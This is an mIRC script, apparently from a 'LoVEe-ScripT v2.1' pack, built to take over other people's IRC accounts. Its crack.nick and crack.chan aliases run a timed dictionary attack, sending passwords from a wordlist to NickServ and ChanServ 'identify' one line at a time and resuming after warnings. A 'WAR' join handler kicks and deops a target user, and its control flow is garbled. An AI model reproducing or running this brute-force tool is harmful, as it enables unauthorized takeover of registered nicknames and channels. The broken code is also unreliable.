          crAAAAAAAAAAAAAcKars          
alias crack.nick {
  if (%crack.nick == $null) { echo 0,4* No Nick was entered -- Halted | timer500 off | halt }
  if (%crack.line == $null) { echo 0,4* No line was entered -- Halted | timer500 off | halt }
  if (%crack.dic == $null) { echo 0,4* No dictionary file was entered -- Halted | halt | timer500 off }
  msg nickserv identify %crack.nick $read -l $+ %crack.line %crack.dic 
  inc %crack.line 1
}
alias crack.chan {
  if (%crack.chan == $null) { echo 0,4* No Nick was entered -- Halted | timer500 off | /halt }
  if (%crack.line == $null) { echo 0,4* No line was entered -- Halted | timer500 off | /halt }
  if (%crack.dic == $null) { echo 0,4* No dictionary file was entered -- Halted | timer500 off | /halt }
  msg chanserv identify %crack.chan $read -l $+ %crack.line %crack.dic
  inc %crack.line 1
}
on 1:NOTICEWARNING*:{
  if ($nick == ChanServ) {
    timer501 off | echo 0,4* You Ended On Line %crack.line incase You Need To Continue The Crack Later //|\\LoVEe-ScripT\\|// v2.1 |
    timer 1 10 | timer501 1000000 5 | crack.chan
  }
  elseif ($nick == NickServ) {
    timer500 off | echo 0,4* You Ended On Line %crack.line incase You need To Continue The Crack Later //|\\LoVEe-ScripT\\|// v2.1 |
    timer 1 10 | timer500 1000000 5 | crack.nick
  } 
}
on 1:JOIN:#:{
  if ($nick == $me) {
    if (%kic == 3) { goto END 
      if (%mode == WAR) {
        if (%rev == $me) { unset %rev | /halt }
        inc %man.k
        inc %kic
        kick # %rev 2,0( $+ %kic $+ ) 11-12-11-12-2 4,1<81,4Kick n $+  $+ %man.k $+ 8,14,1> $logo $pub
        msg chanserv deop # %rev 
        halt 
        :END
        set %kic 0
        set %reve off
        halt
      }
    }
  }
}

 <<<<<<<<<<<<<<<<<<<<<<<<<<<<<          >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 <<                                                       >>
 <<                                                                         >>
 <<                               LoVEe                                     >>
 <<                                                                  >>
 <<                                                                         >>
 <<<<<<<<<<<<<<<<<<<<<<<<<<<<<          >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
